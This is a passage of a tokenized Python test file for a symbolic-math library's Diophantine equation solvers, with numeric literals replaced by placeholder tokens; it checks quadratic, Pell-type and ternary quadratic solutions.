diop_solve ( <NUM_LIT:3> * x * y + <NUM_LIT> * x - <NUM_LIT:12> * y + <NUM_LIT:1> ) == set ( [ ( - <NUM_LIT> , - <NUM_LIT:11> ) , ( <NUM_LIT:5> , - <NUM_LIT> ) ] ) <EOL> assert diop_solve ( <NUM_LIT:6> * x * y + <NUM_LIT:2> * x + <NUM_LIT:3> * y + <NUM_LIT:1> ) == set ( [ ] ) <EOL> assert diop_solve ( - <NUM_LIT> * x * y + <NUM_LIT:2> * x - <NUM_LIT:4> * y - <NUM_LIT> ) == set ( [ ( <NUM_LIT> , <NUM_LIT:0> ) ] ) <EOL> assert diop_solve ( - <NUM_LIT> * x * y - <NUM_LIT:30> * x - <NUM_LIT:12> * y - <NUM_LIT> ) == set ( [ ( - <NUM_LIT> , - <NUM_LIT:1> ) ] ) <EOL> assert diop_solve ( <NUM_LIT:2> * x * y + <NUM_LIT:5> * x + <NUM_LIT> * y + <NUM_LIT:7> ) == set ( [ ( - <NUM_LIT> , - <NUM_LIT:3> ) , ( - <NUM_LIT> , - <NUM_LIT:6> ) , ( - <NUM_LIT> , - <NUM_LIT:12> ) , ( - <NUM_LIT> , - <NUM_LIT> ) , ( - <NUM_LIT> , <NUM_LIT:64> ) , ( - <NUM_LIT> , <NUM_LIT:7> ) , ( - <NUM_LIT:9> , <NUM_LIT:1> ) , ( <NUM_LIT> , - <NUM_LIT:2> ) ] ) <EOL> assert diop_solve ( <NUM_LIT:6> * x * y + <NUM_LIT:9> * x + <NUM_LIT:2> * y + <NUM_LIT:3> ) == set ( [ ] ) <EOL> assert diop_solve ( x * y + x + y + <NUM_LIT:1> ) == set ( [ ( - <NUM_LIT:1> , t ) , ( t , - <NUM_LIT:1> ) ] ) <EOL> assert diophantine ( <NUM_LIT> * x * y ) <EOL> def test_quadratic_elliptical_case ( ) : <EOL> assert diop_solve ( <NUM_LIT:4> * x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> + <NUM_LIT:5> * x - <NUM_LIT:11> * y + <NUM_LIT:12> ) == set ( [ ] ) <EOL> assert diop_solve ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> + <NUM_LIT:2> * x + <NUM_LIT:2> * y + <NUM_LIT:2> ) == set ( [ ( - <NUM_LIT:1> , - <NUM_LIT:1> ) ] ) <EOL> assert diop_solve ( <NUM_LIT:10> * x ** <NUM_LIT:2> + <NUM_LIT:12> * x * y + <NUM_LIT:12> * y ** <NUM_LIT:2> - <NUM_LIT> ) == set ( [ ( <NUM_LIT:1> , - <NUM_LIT:2> ) , ( - <NUM_LIT:1> , - <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( - <NUM_LIT:1> , <NUM_LIT:2> ) ] ) <EOL> def test_quadratic_parabolic_case ( ) : <EOL> assert check_solutions ( <NUM_LIT:8> * x ** <NUM_LIT:2> - <NUM_LIT> * x * y + <NUM_LIT> * y ** <NUM_LIT:2> + <NUM_LIT:5> * x + <NUM_LIT:7> * y + <NUM_LIT:16> ) <EOL> assert check_solutions ( <NUM_LIT:8> * x ** <NUM_LIT:2> - <NUM_LIT> * x * y + <NUM_LIT> * y ** <NUM_LIT:2> + <NUM_LIT:6> * x + <NUM_LIT:12> * y - <NUM_LIT:6> ) <EOL> assert check_solutions ( <NUM_LIT:8> * x ** <NUM_LIT:2> + <NUM_LIT> * x * y + <NUM_LIT> * y ** <NUM_LIT:2> + <NUM_LIT:4> * x + <NUM_LIT:6> * y - <NUM_LIT:7> ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> + <NUM_LIT:2> * x * y + y ** <NUM_LIT:2> + <NUM_LIT:2> * x + <NUM_LIT:2> * y + <NUM_LIT:1> ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - <NUM_LIT:2> * x * y + y ** <NUM_LIT:2> + <NUM_LIT:2> * x + <NUM_LIT:2> * y + <NUM_LIT:1> ) <EOL> assert check_solutions ( y ** <NUM_LIT:2> - <NUM_LIT> * x + <NUM_LIT> ) <EOL> def test_quadratic_perfect_square ( ) : <EOL> assert check_solutions ( <NUM_LIT> * x * y ) <EOL> assert check_solutions ( <NUM_LIT:4> * x ** <NUM_LIT:2> - <NUM_LIT:5> * x * y + y ** <NUM_LIT:2> + <NUM_LIT:2> ) <EOL> assert check_solutions ( - <NUM_LIT:2> * x ** <NUM_LIT:2> - <NUM_LIT:3> * x * y + <NUM_LIT:2> * y ** <NUM_LIT:2> - <NUM_LIT:2> * x - <NUM_LIT> * y + <NUM_LIT> ) <EOL> assert check_solutions ( <NUM_LIT:12> * x ** <NUM_LIT:2> + <NUM_LIT> * x * y + <NUM_LIT:3> * y ** <NUM_LIT:2> - <NUM_LIT:2> * x + <NUM_LIT:3> * y - <NUM_LIT:12> ) <EOL> assert check_solutions ( <NUM_LIT:8> * x ** <NUM_LIT:2> + <NUM_LIT:10> * x * y + <NUM_LIT:2> * y ** <NUM_LIT:2> - <NUM_LIT:32> * x - <NUM_LIT> * y - <NUM_LIT> ) <EOL> assert check_solutions ( <NUM_LIT:4> * x ** <NUM_LIT:2> - <NUM_LIT:4> * x * y - <NUM_LIT:3> * y - <NUM_LIT:8> * x - <NUM_LIT:3> ) <EOL> assert check_solutions ( - <NUM_LIT:4> * x * y - <NUM_LIT:4> * y ** <NUM_LIT:2> - <NUM_LIT:3> * y - <NUM_LIT:5> * x - <NUM_LIT:10> ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - y ** <NUM_LIT:2> - <NUM_LIT:2> * x - <NUM_LIT:2> * y ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - <NUM_LIT:9> * y ** <NUM_LIT:2> - <NUM_LIT:2> * x - <NUM_LIT:6> * y ) <EOL> assert check_solutions ( <NUM_LIT:4> * x ** <NUM_LIT:2> - <NUM_LIT:9> * y ** <NUM_LIT:2> - <NUM_LIT:4> * x - <NUM_LIT:12> * y - <NUM_LIT:3> ) <EOL> def test_quadratic_non_perfect_square ( ) : <EOL> assert check_solutions ( x ** <NUM_LIT:2> - <NUM_LIT:2> * x - <NUM_LIT:5> * y ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:3> * x ** <NUM_LIT:2> - <NUM_LIT:2> * y ** <NUM_LIT:2> - <NUM_LIT:2> * x - <NUM_LIT:2> * y ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - x * y - y ** <NUM_LIT:2> - <NUM_LIT:3> * y ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - <NUM_LIT:9> * y ** <NUM_LIT:2> - <NUM_LIT:2> * x - <NUM_LIT:6> * y ) <EOL> def test_issue_9106 ( ) : <EOL> eq = - <NUM_LIT> - <NUM_LIT:2> * x * ( <NUM_LIT:3> * x - <NUM_LIT:1> ) + y * ( <NUM_LIT:3> * y - <NUM_LIT:1> ) <EOL> v = ( x , y ) <EOL> for sol in diophantine ( eq ) : <EOL> assert not diop_simplify ( eq . xreplace ( dict ( zip ( v , sol ) ) ) ) <EOL> @ slow <EOL> def test_quadratic_non_perfect_slow ( ) : <EOL> assert check_solutions ( <NUM_LIT:8> * x ** <NUM_LIT:2> + <NUM_LIT:10> * x * y - <NUM_LIT:2> * y ** <NUM_LIT:2> - <NUM_LIT:32> * x - <NUM_LIT> * y - <NUM_LIT> ) <EOL> assert check_solutions ( - <NUM_LIT:3> * x ** <NUM_LIT:2> - <NUM_LIT:2> * x * y + <NUM_LIT:7> * y ** <NUM_LIT:2> - <NUM_LIT:5> * x - <NUM_LIT:7> ) <EOL> assert check_solutions ( - <NUM_LIT:4> - x + <NUM_LIT:4> * x ** <NUM_LIT:2> - y - <NUM_LIT:3> * x * y - <NUM_LIT:4> * y ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:1> + <NUM_LIT:2> * x + <NUM_LIT:2> * x ** <NUM_LIT:2> + <NUM_LIT:2> * y + x * y - <NUM_LIT:2> * y ** <NUM_LIT:2> ) <EOL> def test_DN ( ) : <EOL> assert diop_DN ( <NUM_LIT:3> , <NUM_LIT:0> ) == [ ( <NUM_LIT:0> , <NUM_LIT:0> ) ] <EOL> assert diop_DN ( - <NUM_LIT> , - <NUM_LIT:5> ) == [ ] <EOL> assert diop_DN ( - <NUM_LIT> , <NUM_LIT> ) == [ ( <NUM_LIT:2> , <NUM_LIT:1> ) ] <EOL> assert diop_DN ( - <NUM_LIT> , <NUM_LIT> ) == [ ( <NUM_LIT:2> , <NUM_LIT:1> ) ] <EOL> assert diop_DN ( - <NUM_LIT:15> , <NUM_LIT> ) == [ ] <EOL> assert diop_DN ( <NUM_LIT:0> , <NUM_LIT:5> ) == [ ] <EOL> assert diop_DN ( <NUM_LIT:0> , <NUM_LIT:9> ) == [ ( <NUM_LIT:3> , t ) ] <EOL> assert diop_DN ( <NUM_LIT:9> , <NUM_LIT:0> ) == [ ( <NUM_LIT:3> * t , t ) ] <EOL> assert diop_DN ( <NUM_LIT:16> , <NUM_LIT> ) == [ ] <EOL> assert diop_DN ( <NUM_LIT:9> , <NUM_LIT> ) == [ ( <NUM_LIT> , <NUM_LIT:4> ) ] <EOL> assert diop_DN ( <NUM_LIT:9> , - <NUM_LIT> ) == [ ( <NUM_LIT:12> , <NUM_LIT:6> ) ] <EOL> assert diop_DN ( <NUM_LIT:7> , <NUM_LIT:0> ) == [ ( <NUM_LIT:0> , <NUM_LIT:0> ) ] <EOL> assert diop_DN ( - <NUM_LIT:1> , <NUM_LIT:5> ) == [ ( <NUM_LIT:1> , <NUM_LIT:2> ) ] <EOL> assert diop_DN ( - <NUM_LIT:1> , <NUM_LIT> ) == [ ( <NUM_LIT:5> , <NUM_LIT:12> ) , ( <NUM_LIT:0> , <NUM_LIT> ) ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT:8> ) ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_DN ( <NUM_LIT> , - <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT:5> ) ] <EOL> assert diop_DN ( <NUM_LIT> , - <NUM_LIT:1> ) == [ ] <EOL> assert diop_DN ( <NUM_LIT> , - <NUM_LIT:1> ) == [ ( <NUM_LIT:32> , <NUM_LIT:5> ) ] <EOL> assert diop_DN ( <NUM_LIT> , - <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT:1> ) ] <EOL> assert diop_DN ( <NUM_LIT> , - <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_DN ( <NUM_LIT:32> , - <NUM_LIT:1> ) == [ ] <EOL> assert diop_DN ( <NUM_LIT> , - <NUM_LIT:4> ) == [ ( <NUM_LIT:3> , <NUM_LIT:1> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT:10> ) ] <EOL> assert equivalent ( - <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:4> ) == True <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT> ) == [ ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT:11> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:12> , <NUM_LIT:3> ) ] <EOL> assert set ( diop_DN ( <NUM_LIT> , <NUM_LIT:12> ) ) == set ( [ ( <NUM_LIT> , <NUM_LIT:1> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) ] ) <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT> ) == [ ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT> ) == [ ( - <NUM_LIT:6> , <NUM_LIT:1> ) , ( <NUM_LIT:6> , <NUM_LIT:1> ) ] <EOL> assert diop_DN ( <NUM_LIT> , <NUM_LIT:2> ) == [ ( <NUM_LIT> , <NUM_LIT:1> ) ] <EOL> assert diop_DN ( <NUM_LIT> , - <NUM_LIT:2> ) == [ ] <EOL> assert diop_DN ( <NUM_LIT> , - <NUM_LIT:2> ) == [ ( <NUM_LIT:11> , <NUM_LIT:1> ) ] <EOL> assert equivalent ( <NUM_LIT:11> , <NUM_LIT:1> , - <NUM_LIT:11> , <NUM_LIT:1> , <NUM_LIT> , - <NUM_LIT:2> ) <EOL> assert diop_DN ( <NUM_LIT> , - <NUM_LIT> ) == [ ( - <NUM_LIT:10> , <NUM_LIT:1> ) , ( <NUM_LIT:10> , <NUM_LIT:1> ) ] <EOL> assert diop_DN ( <NUM_LIT:0> , <NUM_LIT:0> , t ) == [ ( <NUM_LIT:0> , t ) ] <EOL> assert diop_DN ( <NUM_LIT:0> , - <NUM_LIT:1> , t ) == [ ] <EOL> def test_bf_pell ( ) : <EOL> assert diop_bf_DN ( <NUM_LIT> , - <NUM_LIT:4> ) == [ ( <NUM_LIT:3> , <NUM_LIT:1> ) , ( - <NUM_LIT:3> , <NUM_LIT:1> ) , ( <NUM_LIT> , <NUM_LIT:10> ) ] <EOL> assert diop_bf_DN ( <NUM_LIT> , <NUM_LIT> ) == [ ( <NUM_LIT:12> , <NUM_LIT:3> ) , ( - <NUM_LIT:12> , <NUM_LIT:3> ) , ( <NUM_LIT> , <NUM_LIT:11> ) , ( - <NUM_LIT> , <NUM_LIT:11> ) ] <EOL> assert diop_bf_DN ( <NUM_LIT> , - <NUM_LIT:2> ) == [ ] <EOL> assert diop_bf_DN ( <NUM_LIT> , <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_bf_DN ( <NUM_LIT> , - <NUM_LIT:8> ) == [ ( <NUM_LIT:9> , <NUM_LIT:1> ) , ( - <NUM_LIT:9> , <NUM_LIT:1> ) ] <EOL> assert diop_bf_DN ( <NUM_LIT> , - <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_bf_DN ( <NUM_LIT> , - <NUM_LIT:4> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_bf_DN ( - <NUM_LIT:1> , <NUM_LIT:0> , t ) == [ ( <NUM_LIT:0> , <NUM_LIT:0> ) ] <EOL> assert diop_bf_DN ( <NUM_LIT:0> , <NUM_LIT:0> , t ) == [ ( <NUM_LIT:0> , t ) ] <EOL> assert diop_bf_DN ( <NUM_LIT:4> , <NUM_LIT:0> , t ) == [ ( <NUM_LIT:2> * t , t ) , ( - <NUM_LIT:2> * t , t ) ] <EOL> assert diop_bf_DN ( <NUM_LIT:3> , <NUM_LIT:0> , t ) == [ ( <NUM_LIT:0> , <NUM_LIT:0> ) ] <EOL> assert diop_bf_DN ( <NUM_LIT:1> , - <NUM_LIT:2> , t ) == [ ] <EOL> def test_length ( ) : <EOL> assert length ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> ) == <NUM_LIT:1> <EOL> assert length ( - <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:5> ) == <NUM_LIT:3> <EOL> assert length ( - <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT> ) == <NUM_LIT:5> <EOL> assert length ( <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT> ) == <NUM_LIT:6> <EOL> assert length ( - <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT> ) == <NUM_LIT> <EOL> assert length ( <NUM_LIT:7> , <NUM_LIT> , <NUM_LIT:11> ) == <NUM_LIT> <EOL> assert length ( - <NUM_LIT> , <NUM_LIT:5> , <NUM_LIT> ) == <NUM_LIT:4> <EOL> assert length ( <NUM_LIT:1> , <NUM_LIT:6> , <NUM_LIT:4> ) == <NUM_LIT:2> <EOL> def is_pell_transformation_ok ( eq ) : <EOL> """<STR_LIT>""" <EOL> A , B = transformation_to_DN ( eq ) <EOL> u = ( A * Matrix ( [ X , Y ] ) + B ) [ <NUM_LIT:0> ] <EOL> v = ( A * Matrix ( [ X , Y ] ) + B ) [ <NUM_LIT:1> ] <EOL> simplified = diop_simplify ( eq . subs ( zip ( ( x , y ) , ( u , v ) ) ) ) <EOL> coeff = dict ( [ reversed ( t . as_independent ( * [ X , Y ] ) ) for t in simplified . args ] ) <EOL> for term in [ X * Y , X , Y ] : <EOL> if term in coeff . keys ( ) : <EOL> return False <EOL> for term in [ X ** <NUM_LIT:2> , Y ** <NUM_LIT:2> , <NUM_LIT:1> ] : <EOL> if term not in coeff . keys ( ) : <EOL> coeff [ term ] = <NUM_LIT:0> <EOL> if coeff [ X ** <NUM_LIT:2> ] != <NUM_LIT:0> : <EOL> return divisible ( coeff [ Y ** <NUM_LIT:2> ] , coeff [ X ** <NUM_LIT:2> ] ) and divisible ( coeff [ <NUM_LIT:1> ] , coeff [ X ** <NUM_LIT:2> ] ) <EOL> return True <EOL> def test_transformation_to_pell ( ) : <EOL> assert is_pell_transformation_ok ( - <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT:7> * x * y + y ** <NUM_LIT:2> + <NUM_LIT:2> * x - <NUM_LIT:2> * y - <NUM_LIT> ) <EOL> assert is_pell_transformation_ok ( - <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT> * x * y - <NUM_LIT:7> * y ** <NUM_LIT:2> - <NUM_LIT:5> * x - <NUM_LIT> * y - <NUM_LIT> ) <EOL> assert is_pell_transformation_ok ( x ** <NUM_LIT:2> - y ** <NUM_LIT:2> + <NUM_LIT> ) <EOL> assert is_pell_transformation_ok ( - x ** <NUM_LIT:2> + <NUM_LIT:7> * y ** <NUM_LIT:2> - <NUM_LIT> ) <EOL> assert is_pell_transformation_ok ( <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT> * x * y + <NUM_LIT:5> * y ** <NUM_LIT:2> - <NUM_LIT:5> * x - <NUM_LIT:10> * y + <NUM_LIT:5> ) <EOL> assert is_pell_transformation_ok ( <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT:30> * x * y + y ** <NUM_LIT:2> - <NUM_LIT:3> * y - <NUM_LIT> * x - <NUM_LIT> ) <EOL> assert is_pell_transformation_ok ( x ** <NUM_LIT:2> - <NUM_LIT:2> * x * y - <NUM_LIT> * y ** <NUM_LIT:2> - <NUM_LIT:7> * y - <NUM_LIT> * x - <NUM_LIT> ) <EOL> assert is_pell_transformation_ok ( <NUM_LIT:15> * x ** <NUM_LIT:2> - <NUM_LIT:9> * x * y + <NUM_LIT> * y ** <NUM_LIT:2> - <NUM_LIT> * x - <NUM_LIT> * y - <NUM_LIT> ) <EOL> def test_find_DN ( ) : <EOL> assert find_DN ( x ** <NUM_LIT:2> - <NUM_LIT:2> * x - y ** <NUM_LIT:2> ) == ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> assert find_DN ( x ** <NUM_LIT:2> - <NUM_LIT:3> * y ** <NUM_LIT:2> - <NUM_LIT:5> ) == ( <NUM_LIT:3> , <NUM_LIT:5> ) <EOL> assert find_DN ( x ** <NUM_LIT:2> - <NUM_LIT:2> * x * y - <NUM_LIT:4> * y ** <NUM_LIT:2> - <NUM_LIT:7> ) == ( <NUM_LIT:5> , <NUM_LIT:7> ) <EOL> assert find_DN ( <NUM_LIT:4> * x ** <NUM_LIT:2> - <NUM_LIT:8> * x * y - y ** <NUM_LIT:2> - <NUM_LIT:9> ) == ( <NUM_LIT:20> , <NUM_LIT> ) <EOL> assert find_DN ( <NUM_LIT:7> * x ** <NUM_LIT:2> - <NUM_LIT:2> * x * y - y ** <NUM_LIT:2> - <NUM_LIT:12> ) == ( <NUM_LIT:8> , <NUM_LIT> ) <EOL> assert find_DN ( - <NUM_LIT:3> * x ** <NUM_LIT:2> + <NUM_LIT:4> * x * y - y ** <NUM_LIT:2> ) == ( <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> assert find_DN ( - <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT:7> * x * y + y ** <NUM_LIT:2> + <NUM_LIT:2> * x - <NUM_LIT:2> * y - <NUM_LIT> ) == ( <NUM_LIT> , - <NUM_LIT> ) <EOL> def test_ldescent ( ) : <EOL> u = ( [ ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:3> , - <NUM_LIT:11> ) , ( <NUM_LIT> , - <NUM_LIT> ) , ( <NUM_LIT:4> , - <NUM_LIT:7> ) , ( - <NUM_LIT:7> , <NUM_LIT:4> ) , ( <NUM_LIT> , - <NUM_LIT:3> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , - <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:4> , <NUM_LIT:32> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT:1> ) , ( <NUM_LIT> , - <NUM_LIT> ) ] ) <EOL> for a , b in u : <EOL> w , x , y = ldescent ( a , b ) <EOL> assert a * x ** <NUM_LIT:2> + b * y ** <NUM_LIT:2> == w ** <NUM_LIT:2> <EOL> assert ldescent ( - <NUM_LIT:1> , - <NUM_LIT:1> ) is None <EOL> def test_diop_ternary_quadratic_normal ( ) : <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:5> * x ** <NUM_LIT:2> + <NUM_LIT:4> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:3> * x ** <NUM_LIT:2> + <NUM_LIT:6> * y ** <NUM_LIT:2> - <NUM_LIT:3> * z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:4> * x ** <NUM_LIT:2> + <NUM_LIT:5> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:16> * x ** <NUM_LIT:2> + y ** <NUM_LIT:2> - <NUM_LIT> * z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:6> * x ** <NUM_LIT:2> - y ** <NUM_LIT:2> + <NUM_LIT:10> * z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT:12> * y ** <NUM_LIT:2> - <NUM_LIT:9> * z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT:3> * y ** <NUM_LIT:2> - <NUM_LIT> * z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT:30> * y ** <NUM_LIT:2> - <NUM_LIT> * z ** <NUM_LIT:2> ) <EOL> def is_normal_transformation_ok ( eq ) : <EOL> A = transformation_to_normal ( eq ) <EOL> X , Y , Z = A * Matrix ( [ x , y , z ] ) <EOL> simplified = diop_simplify ( eq . subs ( zip ( ( x , y , z ) , ( X , Y , Z ) ) ) ) <EOL> coeff = dict ( [ reversed ( t . as_independent ( * [ X , Y , Z ] ) ) for t in simplified . args ] ) <EOL> for term in [ X * Y , Y * Z , X * Z ] : <EOL> if term in coeff . keys ( ) : <EOL> return False <EOL> return True <EOL> def test_transformation_to_normal ( ) : <EOL> assert is_normal_transformation_ok ( x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> + z ** <NUM_LIT:2> - <NUM_LIT> * x * y - <NUM_LIT:16> * y * z + <NUM_LIT:12> * x * z ) <EOL> assert is_normal_transformation_ok ( x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> - <NUM_LIT:100> * z ** <NUM_LIT:2> ) <EOL> assert is_normal_transformation_ok ( x ** <NUM_LIT:2> + <NUM_LIT> * y * z ) <EOL> assert is_normal_transformation_ok ( <NUM_LIT:3> * y ** <NUM_LIT:2> - <NUM_LIT:100> * z ** <NUM_LIT:2> - <NUM_LIT:12> * x * y ) <EOL> assert is_normal_transformation_ok ( x ** <NUM_LIT:2> + <NUM_LIT> * x * y - <NUM_LIT> * y * z + <NUM_LIT:12> * x * z ) <EOL> assert is_normal_transformation_ok ( z ** <NUM_LIT:2> + <NUM_LIT> * x * y - <NUM_LIT> * y * z + x * z ) <EOL> assert is_normal_transformation_ok ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> + z ** <NUM_LIT:2> - x * y - y * z - x * z ) <EOL> assert is_normal_transformation_ok ( x ** <NUM_LIT:2> + <NUM_LIT:2> * y * z + <NUM_LIT:3> * z ** <NUM_LIT:2> ) <EOL> assert is_normal_transformation_ok ( x * y + <NUM_LIT:2> * x * z + <NUM_LIT:3> * y * z ) <EOL> assert is_normal_transformation_ok ( <NUM_LIT:2> * x * z + <NUM_LIT:3> * y * z ) <EOL> def test_diop_ternary_quadratic ( ) : <EOL> assert check_solutions ( <NUM_LIT:2> * x ** <NUM_LIT:2> + z ** <NUM_LIT:2> + y ** <NUM_LIT:2> - <NUM_LIT:4> * x * y ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - y ** <NUM_LIT:2> - z ** <NUM_LIT:2> - x * y - y * z ) <EOL> assert check_solutions ( <NUM_LIT:3> * x ** <NUM_LIT:2> - x * y - y * z - x * z ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - y * z - x * z ) <EOL> assert check_solutions ( <NUM_LIT:5> * x ** <NUM_LIT:2> - <NUM_LIT:3> * x * y - x * z ) <EOL> assert check_solutions ( <NUM_LIT:4> * x ** <NUM_LIT:2> - <NUM_LIT:5> * y ** <NUM_LIT:2> - x * z ) <EOL> assert check_solutions ( <NUM_LIT:3> * x ** <NUM_LIT:2> + <NUM_LIT:2> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> - <NUM_LIT:2> * x * y + <NUM_LIT:5> * y * z - <NUM_LIT:7> * y * z ) <EOL> assert check_solutions ( <NUM_LIT:8> * x ** <NUM_LIT:2> - <NUM_LIT:12> * y * z ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT:7> * y ** <NUM_LIT:2> - <NUM_LIT:8> * x * y - z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - <NUM_LIT> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> + <NUM_LIT> * z * y - <NUM_LIT:8> * x * y ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> + <NUM_LIT:5> * x * y + <NUM_LIT:2> * z * y + <NUM_LIT:5> * x * z ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> + z ** <NUM_LIT:2> - x * y - <NUM_LIT> * y * z ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> + z ** <NUM_LIT:2> - x * y - <NUM_LIT:16> * y * z + <NUM_LIT:12> * x * z ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> + z ** <NUM_LIT:2> - <NUM_LIT> * x * y - <NUM_LIT:16> * y * z + <NUM_LIT:12> * x * z ) <EOL> assert check_solutions ( x * y - <NUM_LIT:7> * y * z + <NUM_LIT> * x * z ) <EOL> assert diop_ternary_quadratic_normal ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> + z ** <NUM_LIT:2> ) == ( None , None , None ) <EOL> assert diop_ternary_quadratic_normal ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> ) is None <EOL> raises ( ValueError , lambda : <EOL> _diop_ternary_quadratic_normal ( ( x , y , z ) , <EOL> { x * y : <NUM_LIT:1> , x ** <NUM_LIT:2> : <NUM_LIT:2> , y ** <NUM_LIT:2> : <NUM_LIT:3> , z ** <NUM_LIT:2> : <NUM_LIT:0> } ) ) <EOL> eq = - <NUM_LIT:2> * x * y - <NUM_LIT:6> * x * z + <NUM_LIT:7> * y ** <NUM_LIT:2> - <NUM_LIT:3> * y * z + <NUM_LIT:4> * z ** <NUM_LIT:2> <EOL> assert diop_ternary_quadratic ( eq ) == ( <NUM_LIT:7> , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> assert diop_ternary_quadratic_normal ( <NUM_LIT:4> * x ** <NUM_LIT:2> + <NUM_LIT:5> * y ** <NUM_LIT:2> - z ** 